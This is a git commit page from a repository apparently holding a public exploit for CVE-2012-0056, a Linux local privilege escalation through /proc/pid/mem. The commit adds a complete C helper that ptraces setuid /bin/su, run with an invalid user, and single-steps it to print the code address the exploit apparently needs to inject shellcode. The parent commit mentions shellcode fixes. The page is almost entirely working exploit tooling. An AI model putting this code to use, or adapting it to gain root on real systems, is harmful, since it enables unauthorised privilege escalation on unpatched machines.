diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 06:24:30 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 06:24:30 +0100 |
commit | c95b8b8f04572fb3409530982451e7a5fd122673 (patch) | |
tree | d268e53398b5554b5400a4f61bc059dd1f53e782 /ptrace-offset-finder.c | |
parent | Fix shellcode for dirty rsi. (diff) | |
download | CVE-2012-0056-c95b8b8f04572fb3409530982451e7a5fd122673.tar.xz CVE-2012-0056-c95b8b8f04572fb3409530982451e7a5fd122673.zip |
Add initial version of ptrace finder for x64.
Diffstat (limited to 'ptrace-offset-finder.c')
-rw-r--r-- | ptrace-offset-finder.c | 46 |
1 files changed, 46 insertions, 0 deletions
diff --git a/ptrace-offset-finder.c b/ptrace-offset-finder.c new file mode 100644 index 0000000..34e5682 --- /dev/null +++ b/ptrace-offset-finder.c @@ -0,0 +1,46 @@ +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <errno.h> +#include <unistd.h> +#include <fcntl.h> +#include <sys/wait.h> +#include <sys/types.h> +#include <sys/user.h> +#include <sys/ptrace.h> +#include <sys/reg.h> +#include <asm/unistd_64.h> + +int main(int argc, char *argv[]) +{ + int fd[2]; + pipe2(fd, O_NONBLOCK); + int child = fork(); + if (child) { + close(fd[1]); + char buf; + for (;;) { + wait(NULL); + if (read(fd[0], &buf, 1) > 0) + break; + ptrace(PTRACE_SYSCALL, child, NULL, NULL); + } + + struct user_regs_struct regs; + for (;;) { + ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); + wait(NULL); + ptrace(PTRACE_GETREGS, child, NULL, ®s); + if (regs.rip < 0x700000000000) { + printf("0x%lx\n", regs.rip); + break; + } + } + } else { + ptrace(PTRACE_TRACEME, 0, NULL, NULL); + close(fd[0]); + dup2(fd[1], 2); + execl("/bin/su", "su", "not-a-valid-user", NULL); + } + return 0; +} |